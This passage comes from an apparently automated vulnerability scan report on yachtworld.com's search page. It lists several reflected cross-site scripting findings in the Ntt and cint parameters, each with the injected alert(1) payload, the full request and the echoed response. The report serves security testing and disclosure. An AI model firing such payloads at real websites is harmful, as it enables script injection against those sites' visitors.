s_pers=%20s_nr%3D1296156045407%7C1298748045407%3B%20s_lv%3D1296156045410%7C1390764045410%3B%20s_lv_s%3DFirst%2520Visit%7C1296157845410%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromY%252526ot%25253DA%3B

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 27 Jan 2011 19:40:41 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "1058b65';alert(1)//c6b76bbd859"<br>
...[SNIP]...

3.361. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [Ntt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the Ntt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf93a"style%3d"x%3aexpression(alert(1))"2b5366e8ff0642534 was submitted in the Ntt parameter. This input was echoed as cf93a"style="x:expression(alert(1))"2b5366e8ff0642534 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /core/listing/cache/searchResults.jsp?man=regulator&is=false&type=&luom=126&fromLength=24&toLength=32&fromYear=2004&toYear=&pricderange=Select+Price+Range&Ntt=cf93a"style%3d"x%3aexpression(alert(1))"2b5366e8ff0642534&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3&Ntk=boatsEN&currencyid=100 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:28 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<meta name="description" content="2004 cf93a"style="x:expression(alert(1))"2b5366e8ff0642534 regulator Boats For Sale - YachtWorld.com">
...[SNIP]...

3.362. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [Ntt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the Ntt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49516"style%3d"x%3aexpression(alert(1))"5bb11662727 was submitted in the Ntt parameter. This input was echoed as 49516"style="x:expression(alert(1))"5bb11662727 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=49516"style%3d"x%3aexpression(alert(1))"5bb11662727&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=&rid=&cint=100&pbsint=&boatsAddedSelected=-1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.22.10.1296155952; s_pers=%20s_nr%3D1296156246717%7C1298748246717%3B%20s_lv%3D1296156246727%7C1390764246727%3B%20s_lv_s%3DFirst%2520Visit%7C1296158046727%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DadvancedSearch_US%252526pidt%25253D1%252526oid%25253DSearch%252526oidt%25253D3%252526ot%25253DSUBMIT%3B; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:24 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<meta name="description" content="2004 49516"style="x:expression(alert(1))"5bb11662727 regulator Boats For Sale - YachtWorld.com">
...[SNIP]...

3.363. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [Ntt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the Ntt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3198b"%3balert(1)//94e71135684 was submitted in the Ntt parameter. This input was echoed as 3198b";alert(1)//94e71135684 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=3198b"%3balert(1)//94e71135684&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=&rid=&cint=100&pbsint=&boatsAddedSelected=-1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.22.10.1296155952; s_pers=%20s_nr%3D1296156246717%7C1298748246717%3B%20s_lv%3D1296156246727%7C1390764246727%3B%20s_lv_s%3DFirst%2520Visit%7C1296158046727%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DadvancedSearch_US%252526pidt%25253D1%252526oid%25253DSearch%252526oidt%25253D3%252526ot%25253DSUBMIT%3B; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:24 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<!--
s.prop4="3198b";alert(1)//94e71135684"
s.prop5="regulator"
s.prop6="Used"
s.prop7="no search phrase entered"
s.prop8="24'-32'"
s.prop9=">
...[SNIP]...

3.364. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [Ntt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the Ntt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39607"%3balert(1)//b40b46340cb2aec7a was submitted in the Ntt parameter. This input was echoed as 39607";alert(1)//b40b46340cb2aec7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?man=regulator&is=false&type=&luom=126&fromLength=24&toLength=32&fromYear=2004&toYear=&pricderange=Select+Price+Range&Ntt=39607"%3balert(1)//b40b46340cb2aec7a&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3&Ntk=boatsEN&currencyid=100 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:30 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<!--
s.prop4="39607";alert(1)//b40b46340cb2aec7a"
s.prop5="regulator"
s.prop6="Used"
s.prop7="no search phrase entered"
s.prop8="24'-32'"
s.prop9=">
...[SNIP]...

3.365. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [cint parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the cint request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 169f3'%3balert(1)//f9a9fff124 was submitted in the cint parameter. This input was echoed as 169f3';alert(1)//f9a9fff124 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?cint=100169f3'%3balert(1)//f9a9fff124&fromYear=2004&Ntk=boatsEN&searchtype=homepage&hmid=0&sm=3&enid=0&currencyid=100&toLength=32&cit=true&luom=126&boatsAddedSelected=-1&fromLength=24&fromPrice=0&ftid=0&man=regulator&slim=quick&is=false&No=10 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=&rid=&cint=100&pbsint=&boatsAddedSelected=-1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.24.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; 